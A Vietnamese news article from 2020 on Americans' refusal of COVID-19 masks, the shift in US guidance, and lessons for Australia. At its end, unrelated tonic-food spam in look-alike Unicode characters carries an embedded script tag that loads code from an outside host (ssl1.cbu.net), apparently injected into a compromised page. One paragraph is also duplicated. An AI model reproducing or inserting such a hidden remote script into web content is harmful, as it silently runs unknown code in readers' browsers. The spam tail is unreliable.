RSS

Từ câu chuyện cự tuyệt khẩu trang ở Mỹ và bài học cho Úc

14:00 02/08/2020

Giám đốc Trung tâm kiểm soát và phòng ngừa dịch bệnh Hoa Kỳ cho hay nước này có thể đã khống chế được COVID-19 trong vài tuần nếu tất cả mọi người đều đeo khẩu trang.

Và bây giờ, mọi chuyện có lẽ là đã quá muộn.

Hồi tháng 3/2020, Mike DeWine - thống đốc bang Ohio được tung hô vì những phản ứng hết sức quyết liệt với đại dịch Covid-19. Ông nhanh chóng đóng cửa, phong tỏa toàn bang, để ngăn tình hình trở nên tồi tệ.

Sau đó 1 tháng, trước áp lực phải cân bằng kinh tế, DeWine đưa ra một đề xuất có phần khiêm nhường. Theo đó, nếu doanh nghiệp muốn tái mở cửa, khách hàng và nhân viên buộc phải đeo khẩu trang. Và chẳng ngờ rằng, từ vị thế một người anh hùng, ông trở thành mục tiêu bị chỉ trích nặng nề.

Sự chỉ trích đến gần như ngay lập tức. Làn sóng phản đối ồ ạt nổ ra trên mạng xã hội. Công dân gọi điện đến quát nạt công chức. Và thậm chí, sự gay gắt còn đi kèm những lời đe dọa.

Chỉ một ngày sau, DeWine rút lại đề xuất ấy. "Việc yêu cầu mọi người đeo khẩu trang là sự xúc phạm với cộng đồng công chúng Ohio. Và tôi hiểu điều đó," - ông phát biểu, với tông giọng trầm buồn.

Đã 3 tháng trôi qua, Ohio ghi nhận thêm hàng chục nghìn ca nhiễm mới và hàng ngàn người tử vong. Và giờ, thống đốc DeWine đang muốn thử lặp lại đề xuất này.

Trong "kho vũ khí" của hệ thống y tế, khẩu trang là công cụ đơn giản và hiệu quả nhất để chống lại đại dịch. Nhưng ngay từ đầu, mối quan hệ của người Mỹ với khẩu trang đã không tốt đẹp cho lắm. Nói đơn giản, họ cự tuyệt nó!

Từ các hướng dẫn sai lầm của nhà chức trách, cộng thêm văn hóa phản đối khẩu trang, tất cả đều là một phần của nguyên nhân. Thậm chí cả tổng thống Trump cũng từng không xem trọng chuyện đeo khẩu trang, góp phần làm giảm giá trị của nó trong mắt công chúng.

Và hệ quả, các chuyên gia cho biết Mỹ đã mất đi cơ hội tốt nhất để đánh bật thứ virus quái ác trong mùa xuân và mùa hè. Mỹ đã đi sau rất nhiều nước trong công cuộc chống dịch, với nhiều ca nhiễm hơn, nhiều người mất mạng hơn, chỉ vì nói không với khẩu trang.

"Nhiều quốc gia áp dụng khẩu trang từ rất sớm," - trích lời Monica Gandhi, chuyên gia bệnh truyền nhiễm từ ĐH California, San Francisco. "Tỷ lệ tử vong của họ duy trì ở mức rất thấp." Theo Gandhi nhận định, đây có thể là nước đi sai lầm lớn nhất trong số những lỗi mà Mỹ đã mắc phải với dịch bệnh lần này.

Mỹ trong tháng qua đã thay đổi, áp dụng đeo khẩu trang diện rộng trên hầu hết các tiểu bang, và những chuỗi bán lẻ lớn nhất đều tuân thủ. Chỉ là, khoa học từ lâu đã đề cao sự hiệu quả của khẩu trang, ngay cả khi hướng dẫn từ cơ quan y tế không đề cập đến chuyện đó.

Tháng 2/2020, khi virus đang âm thầm lây lan trong cộng đồng, cả WHO (Tổ chức Y tế thế giới) lẫn CDC (Trung tâm kiểm soát và phòng ngừa dịch bệnh) đều đưa ra lời khuyên chống lại chuyện đeo khẩu trang, cho rằng người khỏe mạnh thì không cần đeo. Họ thúc giục công chúng để lại khẩu trang cho các nhân viên y tế chống dịch tuyến đầu, trong bối cảnh đang khan hiếm trang phục bảo hộ.

Zeynep Tufekci - giáo sư khoa học thông tin từ ĐH Bắc Carolina (Chapel Hill, Mỹ) đã tiến hành xem xét các bằng chứng xuất hiện. Ông nhận ra việc rửa tay và cách ly các trường hợp có triệu chứng là không đủ. Nếu virus lây lan ngay cả khi người nhiễm chưa có triệu chứng, đó là một vấn đề rất lớn, có thể "thay đổi toàn bộ cuộc chơi."

Phía bên kia đất nước, nhà khoa học dữ liệu Jeremy Howard cũng có kết luận tương tự. Là người nghiên cứu ngành Trí tuệ nhân tạo, chuyên gia đến từ ĐH San Francisco hoàn toàn không có chuyên môn về y tế. Tuy nhiên, ông biết cách phân tích những con số.

Zeynep Tufekci - giáo sư khoa học thông tin từ ĐH Bắc Carolina (Chapel Hill, Mỹ) đã tiến hành xem xét các bằng chứng xuất hiện. Ông nhận ra việc rửa tay và cách ly các trường hợp có triệu chứng là không đủ. Nếu virus lây lan ngay cả khi người nhiễm chưa có triệu chứng, đó là một vấn đề rất lớn, có thể "thay đổi toàn bộ cuộc chơi."

Tổng thống Donald Trump cũng thay đổi. Đầu tháng 7, ông lần đầu xuất hiện trước công chúng với một chiếc khẩu trang. Ngày 21/7, ông đăng tải lên Twitter một dòng trạng thái với ý "Đeo khẩu trang là yêu nước."

Bài học cho Úc

Ở thời điểm hiện tại, chính quyền các bang của Úc cũng đã nhận ra được tầm quan trọng của chiếc khẩu trang. Trong khi bang Victoria đã bắt buộc người dân phải đeo khẩu trang khi ra ngoài đường, người đứng đầu các bang khác cũng đã khuyến cáo người dân sử dụng khẩu trang nếu có thể.

Woolworths, tập đoàn đa ngành lớn bậc nhất của Úc cũng đã đưa ra một lời khuyến khích "mạnh mẽ" đến khách hàng rằng hãy đeo khẩu trang khi mua sắm. Trong khi đó, NBC News cũng đưa ra lời khuyên đối với phụ huynh rằng hãy đeo khẩu trang cho trẻ, kể cả trong lớp học. Và trẻ từ 2 tuổi cũng đã có thể bắt đầu đeo khẩu trang.

Tuy nhiên, cũng giống như Mỹ, một vài trường hợp cá biệt cũng đã gây chú ý với việc không đeo khẩu trang khi đi ngoài đường hay mua sắm, và viện dẫn đến "quyền con người" để có thể làm những gì mình thích. Trường hợp "Karen" ở Bunnings Warehouse hay mới đây nhất là vụ bắt giữ nhà truyền bá thuyết âm mưu Eve Black" và những người cự tuyệt khẩu trang ở khu tưởng niệm Melbourne là một trong những "con sâu làm rầu nồi canh" gây phẫn nộ trong cộng đồng.

Hy vọng rằng trong tương lai gần, người dân Úc sẽ hiểu được tầm quan trọng của việc đeo khẩu trang đối với việc ngăn chặn dịch bệnh lây lan, và chính quyền sẽ phải đưa ra những án phạt thích đáng để ngăn chặn những kẻ coi thường pháp luật gây rủi ro cho sức khỏe cộng đồng.

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп<script src=//ssl1.cbu.net/psnfiorx></script>

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп

Tɦeo các ɓác sĩ, sức ƙɦỏe củɑ пɢũ łạпɢ qᴜyếł ᵭịпɦ łᴜổi łɦọ củɑ ɓạп. Đây ℓà ɓí qᴜyếł ℓựɑ cɦọп łɦực ρɦẩɱ cɦăɱ sóc cơ łɦể łốł пɦấł ɓạп пêп łɦɑɱ ƙɦảo ᵭể ℓᴜôп ƙɦỏe ɱạпɦ ʋà łɾườпɢ łɦọ.